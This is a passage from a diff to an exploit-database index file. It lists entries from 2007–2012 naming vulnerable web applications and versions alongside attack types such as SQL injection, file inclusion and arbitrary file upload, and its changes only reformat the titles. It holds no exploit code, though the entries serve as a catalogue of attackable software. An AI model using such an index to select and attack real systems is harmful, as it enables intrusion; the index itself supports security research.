Vulnerabilities",2010-04-13,cp77fk4r,php,webapps,0 -12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-13,cr4wl3r,php,webapps,0 -12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-13,cr4wl3r,php,webapps,0 +12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - Local File Inclusion / Remote File Inclusion",2010-04-13,cr4wl3r,php,webapps,0 +12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - Local File Inclusion / Remote File Inclusion",2010-04-13,cr4wl3r,php,webapps,0 12195,platforms/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injections",2010-04-13,"Easy Laster",php,webapps,0 12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik - DataBase Download",2010-04-13,indoushka,asp,webapps,0 -12198,platforms/php/webapps/12198.txt,"Games Script - (Galore) Backup Dump",2010-04-13,indoushka,php,webapps,0 +12198,platforms/php/webapps/12198.txt,"Games Script - 'Galore' Backup Dump",2010-04-13,indoushka,php,webapps,0 12199,platforms/asp/webapps/12199.txt,"My School Script - Data Base Download",2010-04-13,indoushka,asp,webapps,0 12200,platforms/php/webapps/12200.txt,"Joomla! Component QPersonel 1.0.2 - SQL Injection",2010-04-13,Valentin,php,webapps,0 12212,platforms/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 - Local File Inclusion",2010-04-14,cr4wl3r,php,webapps,0 @@ -23713,7 +23714,7 @@ id,file,description,date,author,platform,type,port 12270,platforms/php/webapps/12270.txt,"Joomla! Component com_pandafminigames - SQL Injection",2010-04-16,Valentin,php,webapps,0 12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,php,webapps,0 12276,platforms/php/webapps/12276.txt,"Redaxo 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps,0 -12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-18,cr4wl3r,php,webapps,0 +12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 - Local File Inclusion / Remote File Inclusion",2010-04-18,cr4wl3r,php,webapps,0 12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 - SQL Injection",2010-04-18,indoushka,php,webapps,0 12279,platforms/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup",2010-04-18,indoushka,php,webapps,0 12280,platforms/php/webapps/12280.txt,"dl_stats - Multiple Vulnerabilities",2010-04-18,"Valentin Hoebel",php,webapps,0 @@ -23729,13 +23730,13 @@ id,file,description,date,author,platform,type,port 12291,platforms/php/webapps/12291.txt,"Joomla! Component iF surfALERT 1.2 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 12292,platforms/php/webapps/12292.txt,"Flex File Manager - Arbitrary File Upload",2010-04-19,Mr.MLL,php,webapps,0 12295,platforms/php/webapps/12295.txt,"N/X Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0 -12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-19,cr4wl3r,php,webapps,0 +12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 - Local File Inclusion / Remote File Inclusion",2010-04-19,cr4wl3r,php,webapps,0 12299,platforms/php/webapps/12299.txt,"Joomla! Component GBU Facebook 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0 12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 - SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0 12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection",2010-04-20,Ctacok,php,webapps,0 12305,platforms/php/webapps/12305.txt,"Joomla! Component Online News Paper Manager 1.0 - 'cid' SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0 12306,platforms/php/webapps/12306.txt,"Joomla! Component JTM Reseller 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0 -12313,platforms/php/webapps/12313.txt,"Openregistrecil 1.02 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-20,cr4wl3r,php,webapps,0 +12313,platforms/php/webapps/12313.txt,"Openregistrecil 1.02 - Local File Inclusion / Remote File Inclusion",2010-04-20,cr4wl3r,php,webapps,0 12315,platforms/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Arbitrary File Upload",2010-04-21,cyberlog,php,webapps,0 12316,platforms/php/webapps/12316.txt,"Joomla! Component WMI 1.5.0 - Local File Inclusion",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0 12317,platforms/php/webapps/12317.txt,"Joomla! Component OrgChart 1.0.0 - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0 @@ -23763,8 +23764,8 @@ id,file,description,date,author,platform,type,port 12360,platforms/php/webapps/12360.pl,"Template Seller Pro 3.25 - 'tempid' SQL Injection",2010-04-23,v3n0m,php,webapps,0 12361,platforms/php/webapps/12361.txt,"lanewsfactory - Multiple Vulnerabilities",2010-04-23,"Salvatore Fresta",php,webapps,0 12364,platforms/php/webapps/12364.txt,"Openpresse 1.01 - Local File Inclusion",2010-04-24,cr4wl3r,php,webapps,0 -12365,platforms/php/webapps/12365.txt,"Openplanning 1.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-24,cr4wl3r,php,webapps,0 -12366,platforms/php/webapps/12366.txt,"Openfoncier 2.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-24,cr4wl3r,php,webapps,0 +12365,platforms/php/webapps/12365.txt,"Openplanning 1.00 - Local File Inclusion / Remote File Inclusion",2010-04-24,cr4wl3r,php,webapps,0 +12366,platforms/php/webapps/12366.txt,"Openfoncier 2.00 - Local File Inclusion / Remote File Inclusion",2010-04-24,cr4wl3r,php,webapps,0 12369,platforms/php/webapps/12369.txt,"Madirish Webmail 2.01 - 'baseDir' Local/Remote File Inclusion",2010-04-24,eidelweiss,php,webapps,0 12370,platforms/php/webapps/12370.txt,"NCT Jobs Portal Script - Cross-Site Scripting / Authentication Bypass",2010-04-24,Sid3^effects,php,webapps,0 12371,platforms/php/webapps/12371.txt,"WHMCompleteSolution (WHMCS) control (WHMCompleteSolution) - SQL Injection",2010-04-24,"Islam DefenDers",php,webapps,0 @@ -23781,8 +23782,8 @@ id,file,description,date,author,platform,type,port 12387,platforms/php/webapps/12387.sh,"webessence 1.0.2 - Multiple Vulnerabilities",2010-04-25,r00t,php,webapps,0 12395,platforms/php/webapps/12395.txt,"2DayBiz Advanced Poll Script - Cross-Site Scripting / Authentication Bypass",2010-04-26,Sid3^effects,php,webapps,0 12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,cr4wl3r,php,webapps,0 -12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-26,cr4wl3r,php,webapps,0 -12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal - 'index.php' (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0 +12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta - Local File Inclusion / Remote File Inclusion",2010-04-26,cr4wl3r,php,webapps,0 +12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal - 'index.php' 'view' SQL Injection",2010-04-26,41.w4r10r,php,webapps,0 12400,platforms/php/webapps/12400.txt,"Joomla! Component JoomRadio 1.0 - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0 12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup",2010-04-26,indoushka,php,webapps,0 12407,platforms/php/webapps/12407.txt,"CMScout 2.08 - SQL Injection",2010-04-26,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -23795,7 +23796,7 @@ id,file,description,date,author,platform,type,port 12416,platforms/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 - Multiple Vulnerabilities",2010-04-27,ITSecTeam,php,webapps,0 12419,platforms/php/webapps/12419.txt,"Boutique SudBox 1.2 - Cross-Site Request Forgery (Changer Login et Mot de Passe)",2010-04-27,indoushka,php,webapps,0 12420,platforms/php/webapps/12420.php,"Portaneo Portal 2.2.3 - Arbitrary File Upload",2010-04-27,eidelweiss,php,webapps,0 -12421,platforms/php/webapps/12421.txt,"Help Center Live 2.0.6 - (module=helpcenter&file=) Local File Inclusion",2010-04-27,41.w4r10r,php,webapps,0 +12421,platforms/php/webapps/12421.txt,"Help Center Live 2.0.6 - 'module=helpcenter&file=' Local File Inclusion",2010-04-27,41.w4r10r,php,webapps,0 12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,php,webapps,0 12424,platforms/asp/webapps/12424.txt,"Acart 2.0 Shopping Cart - Software Backup Dump",2010-04-27,indoushka,asp,webapps,0 12426,platforms/php/webapps/12426.txt,"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 @@ -23836,7 +23837,7 @@ id,file,description,date,author,platform,type,port 12464,platforms/asp/webapps/12464.txt,"ASPCode CMS 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0 12465,platforms/php/webapps/12465.txt,"Joomla! Component Newsfeeds - SQL Injection",2010-04-30,Archimonde,php,webapps,0 12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion",2010-04-30,eidelweiss,php,webapps,0 -12467,platforms/php/webapps/12467.txt,"Webthaiapp - detail.php (cat) Blind SQL Injection",2010-04-30,Xelenonz,php,webapps,0 +12467,platforms/php/webapps/12467.txt,"Webthaiapp - 'detail.php?cat' Blind SQL Injection",2010-04-30,Xelenonz,php,webapps,0 12468,platforms/php/webapps/12468.txt,"Alibaba Clone Platinum - 'offers_buy.php' SQL Injection",2010-04-30,v3n0m,php,webapps,0 12471,platforms/asp/webapps/12471.txt,"Comersus 8 Shopping Cart - SQL Injection / Cross-Site Request Forgery",2010-05-01,Sid3^effects,asp,webapps,0 12472,platforms/php/webapps/12472.txt,"CF Image Host 1.1 - Remote File Inclusion",2010-05-01,The.Morpheus,php,webapps,0 @@ -23849,7 +23850,7 @@ id,file,description,date,author,platform,type,port 12481,platforms/php/webapps/12481.txt,"WHMCompleteSolution (WHMCS) Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0 12484,platforms/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL Injection / XPath Injection",2010-05-02,indoushka,php,webapps,0 12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,php,webapps,0 -12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-05-02,cr4wl3r,php,webapps,0 +12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 - Local File Inclusion / Remote File Inclusion",2010-05-02,cr4wl3r,php,webapps,0 12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Inclusion",2010-05-03,cr4wl3r,php,webapps,0 12489,platforms/php/webapps/12489.txt,"Joomla! 1.6.0 Alpha2 - Cross-Site Scripting",2010-05-03,mega-itec.com,php,webapps,0 14025,platforms/php/webapps/14025.txt,"2DayBiz Job Site Script - SQL Injection",2010-06-24,Sangteamtham,php,webapps,0 @@ -23882,7 +23883,7 @@ id,file,description,date,author,platform,type,port 12547,platforms/php/webapps/12547.txt,"e-webtech - 'new.asp?id=' SQL Injection",2010-05-10,protocol,php,webapps,0 12550,platforms/php/webapps/12550.pl,"Netvidade engine 1.0 - Multiple Vulnerabilities",2010-05-10,pwndomina,php,webapps,0 12551,platforms/php/webapps/12551.txt,"Spaceacre - Multiple SQL Injections",2010-05-10,gendenk,php,webapps,0 -12552,platforms/php/webapps/12552.txt,"tekno.Portal 0.1b - 'makale.php id' SQL Injection",2010-05-10,CoBRa_21,php,webapps,0 +12552,platforms/php/webapps/12552.txt,"tekno.Portal 0.1b - 'makale.php?id' SQL Injection",2010-05-10,CoBRa_21,php,webapps,0 12553,platforms/php/webapps/12553.txt,"Dark Hart Portal - 'login.php' Remote File Inclusion",2010-05-10,CoBRa_21,php,webapps,0 12556,platforms/php/webapps/12556.txt,"Tadbir CMS - 'FCKeditor' Arbitrary File Upload",2010-05-10,"Pouya Daneshmand",php,webapps,0 12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0 @@ -23915,7 +23916,7 @@ id,file,description,date,author,platform,type,port 12594,platforms/php/webapps/12594.txt,"Joomla! Component com_sebercart - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0 12595,platforms/php/webapps/12595.txt,"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0 12596,platforms/php/webapps/12596.txt,"Link Bid Script - 'links.php' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0 -12597,platforms/php/webapps/12597.txt,"Press Release Script - 'page.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0 +12597,platforms/php/webapps/12597.txt,"Press Release Script - 'page.php?id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0 12598,platforms/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,php,webapps,0 12599,platforms/php/webapps/12599.txt,"Heaven Soft CMS 4.7 - SQL Injection",2010-05-14,PrinceofHacking,php,webapps,0 14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0 @@ -23955,7 +23956,7 @@ id,file,description,date,author,platform,type,port 12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Arbitrary File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0 12647,platforms/php/webapps/12647.txt,"Webloader 7 < 8 - 'vid' SQL Injection",2010-05-18,ByEge,php,webapps,0 12648,platforms/php/webapps/12648.txt,"Joomla! Component com_packages - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0 -12651,platforms/php/webapps/12651.txt,"Lokomedia CMS - (sukaCMS) Local File Disclosure",2010-05-18,vir0e5,php,webapps,0 +12651,platforms/php/webapps/12651.txt,"Lokomedia CMS - 'sukaCMS' Local File Disclosure",2010-05-18,vir0e5,php,webapps,0 12654,platforms/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection",2010-05-18,Pokeng,php,webapps,0 12656,platforms/php/webapps/12656.txt,"Battle Scrypt - Arbitrary File Upload",2010-05-19,DigitALL,php,webapps,0 12658,platforms/freebsd/webapps/12658.txt,"McAfee Email Gateway - Web Administration Broken Access Control",2010-05-19,"Nahuel Grisolia",freebsd,webapps,0 @@ -23990,7 +23991,7 @@ id,file,description,date,author,platform,type,port 12695,platforms/php/webapps/12695.txt,"Azimut Technologie - Admin Login Bypass",2010-05-22,Ra3cH,php,webapps,0 12696,platforms/php/webapps/12696.txt,"E-Commerce Group - 'cat.php' SQL Injection",2010-05-22,"BLack Revenge",php,webapps,0 12697,platforms/php/webapps/12697.php,"hustoj - 'FCKeditor' Arbitrary File Upload",2010-05-22,eidelweiss,php,webapps,0 -12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Arbitrary File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0 +12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - 'WYSIWYG' Arbitrary File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0 12700,platforms/asp/webapps/12700.txt,"DotNetNuke - Arbitrary File Upload",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0 12701,platforms/asp/webapps/12701.txt,"Rave Creations/UHM - 'artists.asp' SQL Injection",2010-05-22,Ra3cH,asp,webapps,0 12702,platforms/php/webapps/12702.php,"ECShop - 'search.php' SQL Injection",2010-05-22,Jannock,php,webapps,0 @@ -24029,9 +24030,9 @@ id,file,description,date,author,platform,type,port 12746,platforms/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,php,webapps,0 12748,platforms/php/webapps/12748.txt,"Multi Vendor Mall - 'pages.php' SQL Injection",2010-05-26,Newbie_Campuz,php,webapps,0 12749,platforms/php/webapps/12749.txt,"Book Gallery - 'aboutbook.php' SQL Injection",2010-05-26,Mr.P3rfekT,php,webapps,0 -12750,platforms/windows/webapps/12750.txt,"RapidWareX 2.0.1 - (WebUI) Cross-Site Request Forgery",2010-05-26,l3D,windows,webapps,0 +12750,platforms/windows/webapps/12750.txt,"RapidWareX 2.0.1 - 'WebUI' Cross-Site Request Forgery",2010-05-26,l3D,windows,webapps,0 12754,platforms/php/webapps/12754.html,"Easy Address book WebServer 1.2 - Cross-Site Request Forgery",2010-05-26,Markot,php,webapps,0 -12755,platforms/php/webapps/12755.txt,"Multi Vendor Mall - 'itemdetail.php & shop.php' SQL Injection",2010-05-26,CoBRa_21,php,webapps,0 +12755,platforms/php/webapps/12755.txt,"Multi Vendor Mall - 'itemdetail.php?& shop.php' SQL Injection",2010-05-26,CoBRa_21,php,webapps,0 12756,platforms/php/webapps/12756.txt,"Spaceacre - '/index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,php,webapps,0 12761,platforms/php/webapps/12761.txt,"GlobalWebTek Design - SQL Injection",2010-05-27,cyberlog,php,webapps,0 12763,platforms/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,php,webapps,0 @@ -24042,7 +24043,7 @@ id,file,description,date,author,platform,type,port 12770,platforms/php/webapps/12770.txt,"toronja CMS - SQL Injection",2010-05-27,cyberlog,php,webapps,0 12771,platforms/php/webapps/12771.txt,"Toronja CMS - HTML / Cross-Site Scripting Injection",2010-05-27,CoBRa_21,php,webapps,0 12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce - SQL Injection",2010-05-27,cyberlog,php,webapps,0 -12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent - (idproperty) SQL Injection",2010-05-28,v3n0m,php,webapps,0 +12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent - 'idproperty' SQL Injection",2010-05-28,v3n0m,php,webapps,0 12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce - idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0 12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0 12779,platforms/php/webapps/12779.txt,"Joomla! Component My Car 1.0 - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0 @@ -24091,16 +24092,16 @@ id,file,description,date,author,platform,type,port 12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 - Arbitrary File Upload",2010-06-03,indoushka,php,webapps,0 12857,platforms/php/webapps/12857.txt,"E-book Store - Multiple Vulnerabilities",2010-06-03,indoushka,php,webapps,0 12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 - Reinstall",2010-06-03,indoushka,php,webapps,0 -12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites - (File Disclosure) Vulnerabilities",2010-06-03,indoushka,php,webapps,0 +12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites - File Disclosure",2010-06-03,indoushka,php,webapps,0 12861,platforms/php/webapps/12861.txt,"PHP SETI@home Web monitor - 'PHPsetimon' Local/Remote File Inclusion",2010-06-03,eidelweiss,php,webapps,0 12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,php,webapps,0 12867,platforms/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,php,webapps,0 12868,platforms/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,php,webapps,0 -30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 - links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 +30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18594,platforms/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 14247,platforms/php/webapps/14247.txt,"Auction_Software Script - Admin Login Bypass",2010-07-06,ALTBTA,php,webapps,0 -13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion",2010-06-06,eidelweiss,php,webapps,0 +13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - 'skin' Remote File Inclusion",2010-06-06,eidelweiss,php,webapps,0 13737,platforms/php/webapps/13737.txt,"Joomla! Component DJ-ArtGallery 0.9.1 - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0 13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0 13739,platforms/php/webapps/13739.txt,"WmsCMS - Cross-Site Scripting / SQL Injection",2010-06-06,Ariko-Security,php,webapps,0 @@ -24217,7 +24218,7 @@ id,file,description,date,author,platform,type,port 13904,platforms/php/webapps/13904.txt,"Planet 1.1 - Cross-Site Request Forgery (Add Admin)",2010-06-17,G0D-F4Th3r,php,webapps,0 13911,platforms/php/webapps/13911.txt,"Live CMS - SQL Injection",2010-06-17,ahwak2000,php,webapps,0 13912,platforms/php/webapps/13912.txt,"Havij 1.10 - Persistent Cross-Site Scripting",2010-06-17,hexon,php,webapps,0 -13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - (print&sid) SQL Injection",2010-06-17,Gamoscu,php,webapps,0 +13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - 'print&sid' SQL Injection",2010-06-17,Gamoscu,php,webapps,0 13918,platforms/multiple/webapps/13918.txt,"Spring Framework - Arbitrary code Execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0 13922,platforms/php/webapps/13922.txt,"Joomla! Component com_joomdocs - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0 13923,platforms/php/webapps/13923.txt,"Joomla! Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 @@ -24428,7 +24429,7 @@ id,file,description,date,author,platform,type,port 14263,platforms/php/webapps/14263.txt,"Joomla! Component ArtForms 2.1b7.2 rc2 - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0 14265,platforms/php/webapps/14265.txt,"Joomla! Component PaymentsPlus 2.1.5 - Blind SQL Injection",2010-07-07,Sid3^effects,php,webapps,0 14270,platforms/php/webapps/14270.txt,"Zylone IT - Multiple Blind SQL Injections",2010-07-08,Callo,php,webapps,0 -14271,platforms/php/webapps/14271.txt,"Pithcms - (theme) Local/Remote File Inclusion",2010-07-08,eidelweiss,php,webapps,0 +14271,platforms/php/webapps/14271.txt,"Pithcms - 'theme' Local/Remote File Inclusion",2010-07-08,eidelweiss,php,webapps,0 14277,platforms/php/webapps/14277.txt,"Inout Music 1.0 - Arbitrary File Upload",2010-07-08,SONIC,php,webapps,0 14278,platforms/php/webapps/14278.txt,"Inout Article Base Ultimate - Arbitrary File Upload",2010-07-08,SONIC,php,webapps,0 14279,platforms/php/webapps/14279.txt,"Inout Ad server Ultimate - Arbitrary File Upload",2010-07-08,SONIC,php,webapps,0 @@ -24508,8 +24509,8 @@ id,file,description,date,author,platform,type,port 14427,platforms/windows/webapps/14427.txt,"Outlook Web Access 2003 - Cross-Site Request Forgery",2010-07-21,anonymous,windows,webapps,0 14432,platforms/php/webapps/14432.txt,"OpenX - 'phpAdsNew' Remote File Inclusion",2010-07-21,"ViRuS Qalaa",php,webapps,0 14430,platforms/php/webapps/14430.txt,"RapidLeech Scripts - Arbitrary File Upload",2010-07-21,H-SK33PY,php,webapps,0 -14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME - 'welcome.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0 -14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN - 'news.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0 +14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME - 'welcome.php?id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0 +14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN - 'news.php?id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0 14437,platforms/php/webapps/14437.txt,"Free PHP photo Gallery script - Remote Command Execution",2010-07-22,"ViRuS Qalaa",php,webapps,0 14438,platforms/php/webapps/14438.txt,"Free PHP Photo Gallery Script - Remote File Inclusion",2010-07-22,"ViRuS Qalaa",php,webapps,0 14439,platforms/php/webapps/14439.txt,"phpBazar Admin - Information Disclosure",2010-07-22,Net_Spy,php,webapps,0 @@ -24652,7 +24653,7 @@ id,file,description,date,author,platform,type,port 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",2010-09-01,Abysssec,php,webapps,0 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0 14870,platforms/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 -14860,platforms/php/webapps/14860.txt,"PHP Joke Site Software - (sbjoke_id) SQL Injection",2010-09-01,"BorN To K!LL",php,webapps,0 +14860,platforms/php/webapps/14860.txt,"PHP Joke Site Software - 'sbjoke_id' SQL Injection",2010-09-01,"BorN To K!LL",php,webapps,0 14867,platforms/php/webapps/14867.txt,"vbShout 5.2.2 - Local/Remote File Inclusion",2010-09-02,fred777,php,webapps,0 14876,platforms/php/webapps/14876.txt,"Shop a la Cart - Multiple Vulnerabilities",2010-09-02,Ariko-Security,php,webapps,0 14879,platforms/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 @@ -24669,7 +24670,7 @@ id,file,description,date,author,platform,type,port 14902,platforms/php/webapps/14902.txt,"Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injections",2010-09-05,Solidmedia,php,webapps,0 14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager - Persistent Cross-Site Scripting",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager - SQL Injection",2010-09-05,"L0rd CrusAd3r",asp,webapps,0 -14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script - (sbiz_id) Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps,0 +14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script - 'sbiz_id' Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps,0 14911,platforms/php/webapps/14911.sh,"Joomla! Component Gantry 3.0.10 - Blind SQL Injection",2010-09-05,jdc,php,webapps,0 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection",2010-09-07,mr_me,windows,webapps,0 14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 @@ -24684,7 +24685,7 @@ id,file,description,date,author,platform,type,port 14935,platforms/windows/webapps/14935.py,"ColdUserGroup 1.06 - Blind SQL Injection",2010-09-07,mr_me,windows,webapps,0 14942,platforms/php/webapps/14942.txt,"1024 CMS 2.1.1 - Blind SQL Injection",2010-09-07,"Stephan Sattler",php,webapps,0 14943,platforms/asp/webapps/14943.txt,"sirang web-based d-control - Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0 -14952,platforms/php/webapps/14952.txt,"Visitors Google Map Lite 1.0.1 - (FREE) module mod_visitorsgooglemap SQL Injection",2010-09-09,"Chip d3 bi0s",php,webapps,0 +14952,platforms/php/webapps/14952.txt,"Visitors Google Map Lite 1.0.1 Free mod_visitorsgooglemap Module - SQL Injection",2010-09-09,"Chip d3 bi0s",php,webapps,0 14954,platforms/asp/webapps/14954.txt,"aradblog - Multiple Vulnerabilities",2010-09-09,Abysssec,asp,webapps,0 15442,platforms/php/webapps/15442.txt,"Zeeways Adserver - Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps,0 15443,platforms/php/webapps/15443.txt,"Joomla! Component com_forme 1.0.5 - Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0 @@ -24703,7 +24704,7 @@ id,file,description,date,author,platform,type,port 14989,platforms/php/webapps/14989.txt,"osDate - 'uploadvideos.php' Arbitrary File Upload",2010-09-13,Xa7m3d,php,webapps,0 14991,platforms/asp/webapps/14991.txt,"Luftguitar CMS - Upload Arbitrary File",2010-09-13,Abysssec,asp,webapps,0 14995,platforms/php/webapps/14995.txt,"Joomla! Component com_mtree 2.1.5 - Arbitrary File Upload",2010-09-13,jdc,php,webapps,0 -14996,platforms/php/webapps/14996.txt,"Storyteller CMS - (var) Local File Inclusion",2010-09-13,"BorN To K!LL",php,webapps,0 